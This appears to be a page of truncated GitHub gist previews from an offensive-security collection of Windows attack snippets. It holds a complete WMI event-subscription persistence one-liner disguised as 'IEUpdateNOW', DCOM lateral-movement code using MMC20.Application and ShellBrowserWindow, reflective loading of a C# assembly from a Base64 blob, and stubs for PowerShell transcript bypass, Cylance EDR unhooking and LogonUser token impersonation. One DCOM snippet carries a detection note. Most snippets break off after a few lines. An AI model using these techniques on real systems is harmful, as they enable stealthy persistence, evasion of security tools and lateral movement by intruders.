using System; | |
using System.Collections.ObjectModel; | |
using System.Management.Automation; | |
using System.Management.Automation.Security; | |
using System.Management.Automation.Runspaces; | |
using System.Reflection; | |
namespace TranscriptBypass | |
{ | |
// Compiling with CSC.exe v4.0.30319 or v3.5 |
([Security.Principal.WindowsIdentity]::GetCurrent()); | |
$tl=@{Expression={((New-Object System.Security.Principal.SecurityIdentifier($_.Value)).Translate([System.Security.Principal.NTAccount])).Value};Label="Group Name";Width=400}; ([Security.Principal.WindowsIdentity]::GetCurrent()).Groups | FT $tl |
$Filter=Set-WmiInstance -Class __EventFilter -Namespace "root\subscription" -Arguments @{name='IEUpdateNOW';EventNameSpace='root\CimV2';QueryLanguage="WQL";Query="SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA 'Win32_LocalTime' AND TargetInstance.Hour = 9 AND TargetInstance.Minute= 30 GROUP WITHIN 60"}; $Consumer=Set-WmiInstance -Namespace "root\subscription" -Class 'CommandLineEventConsumer' -Arguments @{ name='IEUpdateNOW';CommandLineTemplate="powershell -e blah";RunInteractively='false'}; Set-WmiInstance -Namespace "root\subscription" -Class __FilterToConsumerBinding -Arguments @{Filter=$Filter;Consumer=$Consumer} | |
#https://www.blackhat.com/docs/us-15/materials/us-15-Graeber-Abusing-Windows- | |
Management-Instrumentation-WMI-To-Build-A-Persistent%20Asynchronous-And-Fileless- | |
Backdoor-wp.pdf |
function Unhook-Cylance() { | |
$winapi = @" | |
using System.Runtime.InteropServices; | |
using System; | |
public class Win32 { | |
[DllImport("msvcrt.dll", EntryPoint = "memcpy", CallingConvention = CallingConvention.Cdecl, SetLastError = false)] | |
public static extern IntPtr memcpy(IntPtr dest, string src, uint count); | |
[DllImport("kernel32")] | |
public static extern IntPtr GetProcAddress(IntPtr hModule, string procName); |
# MMC (Tested Windows 7, Windows 10, Server 2012R2): | |
dynamic c = Activator.CreateInstance(Type.GetTypeFromProgID("MMC20.Application", "127.0.0.1")); | |
c.Document.ActiveView.ExecuteShellCommand(@"C:\Windows\System32\cmd.exe",null,"/c notepad.exe", "7"); | |
## Detection: svchost.exe -DCOMLaunch (parent cmdline) -> mmc.exe (process) | |
# ShellBrowserWindow (Tested Windows 10, Server 2012R2): | |
System.Type com = Type.GetTypeFromCLSID(Guid.Parse("C08AFD90-F2A1-11D1-8455-00A0C91F3880"), "127.0.0.1"); | |
dynamic obj = System.Activator.CreateInstance(com); | |
obj.Document.Application.ShellExecute("notepad.exe","","c:\\windows",null,0); |
Add-Type -TypeDefinition @" | |
using System; | |
using System.Runtime.InteropServices; | |
using System.Security.Principal; | |
public static class Advapi32 | |
{ | |
[DllImport("advapi32.dll", SetLastError = true)] | |
public static extern bool LogonUser(string pszUsername, string pszDomain, string pszPassword, int dwLogonType, int dwLogonProvider, ref IntPtr phToken); | |
[DllImport("advapi32.dll", SetLastError=true)] |
# Load C# Module in PS | |
[System.Reflection.Assembly]::LoadFile("C:\Temp\StandIn.exe") | |
# Load C# Module in PS from Base64 Blob | |
$dllbytes = [System.Convert]::FromBase64String("fdsfdsfds") | |
[System.Reflection.Assembly]::Load($dllbytes) | |
# Execute C# Module in PS | |
$Mods=[System.AppDomain]::CurrentDomain.GetAssemblies() | |
foreach ($Mod in $Mods){if ($Mod.FullName -like "StandIn*") {$Mod.EntryPoint.Invoke($null,@(,[string[]]@(""))) }} |
using System; | |
using System.Diagnostics; | |
using System.Runtime.InteropServices; | |
using System.Text; | |
namespace GetAPICall | |
{ | |
class Program | |
{ | |
const uint PROCESS_ALL_ACCESS = 0x000F0000 | 0x00100000 | 0xFFF; |
using System; | |
using System.Collections.Generic; | |
using System.Diagnostics.Eventing.Reader; | |
using System.Text.RegularExpressions; | |
using System.Threading; | |
namespace EventLogSearcher | |
{ | |
class Program | |
{ |
using System; | |
using System.Collections.Generic; | |
using System.Management; | |
using System.DirectoryServices; | |
using System.DirectoryServices.ActiveDirectory; | |
using System.Text; | |
using System.Runtime.Serialization.Formatters.Binary; | |
using System.IO; | |
using System.Collections; | |
using System.Runtime.InteropServices; |